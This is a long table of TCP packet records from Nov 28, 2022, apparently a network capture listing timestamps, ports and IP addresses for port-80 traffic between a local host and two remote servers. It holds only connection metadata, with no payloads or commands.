                                                                    Nov 28, 2022 16:37:02.491884947 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.491913080 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.491985083 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.492059946 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.492084026 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.492135048 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.492136955 CET804982986.109.170.4192.168.11.20
                                                                    Nov 28, 2022 16:37:02.492218018 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.492356062 CET4982980192.168.11.2086.109.170.4
                                                                    Nov 28, 2022 16:37:02.598684072 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:02.607892990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:02.608124018 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:02.608408928 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:02.617386103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671390057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671511889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671583891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671638966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671694040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671749115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671803951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671801090 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.671802044 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.671859026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671912909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.671960115 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.671966076 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.672019005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.672071934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.672123909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.672132969 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.672132969 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.672132969 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.672178984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.672221899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.672306061 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.672467947 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.672467947 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.674726963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.674818993 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.674879074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.674905062 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.674933910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675009966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675071955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675082922 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675082922 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675163031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675250053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675249100 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675250053 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675309896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675365925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675419092 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675421953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675506115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675561905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675586939 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675586939 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675616026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675671101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.675760984 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675760984 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675929070 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675929070 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.675929070 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.681313992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.681395054 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.681510925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.681514025 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.681591034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.681658983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.681695938 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.681755066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.681835890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.681864023 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.681926012 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.682343006 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.688581944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.688676119 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.688755989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.688844919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.688911915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.688967943 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.688968897 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689002037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689078093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689136028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689136982 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689136982 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689191103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689246893 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689300060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689304113 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689305067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689352989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689407110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689460993 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689477921 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689477921 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689513922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689568996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689642906 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689644098 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689740896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689816952 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689816952 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.689909935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.689982891 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.690007925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.690072060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.690125942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.690150976 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.690179110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.690232038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.690287113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.690324068 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.690324068 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.690494061 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.690494061 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.690658092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.690833092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.690897942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.690952063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691005945 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691004992 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.691060066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691112995 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691167116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691198111 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.691198111 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.691344976 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.691344976 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.691509008 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.691521883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691682100 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.691692114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691757917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691812992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691867113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691905022 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.691920042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.691963911 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.691973925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.692028999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.692146063 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.692146063 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.692326069 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.692492962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.692588091 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.692656994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.692693949 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.692715883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.692775965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.692835093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.692893028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.692919970 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.692919970 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.692951918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.693150043 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.693317890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.693320990 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.693320990 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.693481922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.693551064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.693603992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.693619013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.693634987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.693650007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.693665028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.693753004 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.693753004 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.693924904 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.694077015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.694181919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.694232941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.694264889 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.694434881 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.715214968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715234995 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715249062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715290070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715303898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715320110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715337038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715349913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715362072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715383053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715396881 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715409040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715420961 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715547085 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.715547085 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.715629101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715703964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715715885 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.715789080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715812922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715835094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715861082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715884924 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715889931 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.715889931 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.715925932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715953112 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715975046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.715996027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716017008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716031075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716053963 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.716249943 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.716428041 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.716428041 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.716581106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716706038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716734886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716753960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716766119 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716780901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716793060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716804981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716840029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716852903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716865063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716876030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.716943979 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.716943979 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.717112064 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.717112064 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.760814905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760843992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760860920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760876894 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760895014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760910988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760926962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760946035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760962009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760978937 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.760994911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761105061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761111021 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.761111021 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.761140108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761157036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761173964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761223078 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761240005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761276007 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.761276007 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.761282921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761285067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761302948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761318922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761334896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761349916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761365891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761382103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761445045 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.761445045 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.761460066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.761775017 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.761811018 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.761951923 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762109995 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762115002 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.762150049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762185097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762208939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762238026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762267113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762295008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762325048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762331009 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.762331009 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.762377024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762404919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762434959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762466908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.762542009 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.762542009 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.762715101 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.763057947 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763099909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763134956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763248920 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.763304949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763322115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763336897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763351917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763369083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763385057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763397932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.763418913 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.763592005 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.776225090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776283979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776340008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776355982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776381016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776408911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776437044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776453972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776468992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776527882 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.776527882 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.776566029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776582956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776597977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776621103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776735067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.776735067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.776777983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776808977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776866913 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.776894093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776909113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776922941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776937962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776957989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.776983976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777009964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777038097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777040958 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.777040958 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.777062893 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777206898 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.777206898 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.777250051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777264118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:03.777378082 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.777559996 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:03.777740955 CET8049830104.21.2.6192.168.11.20
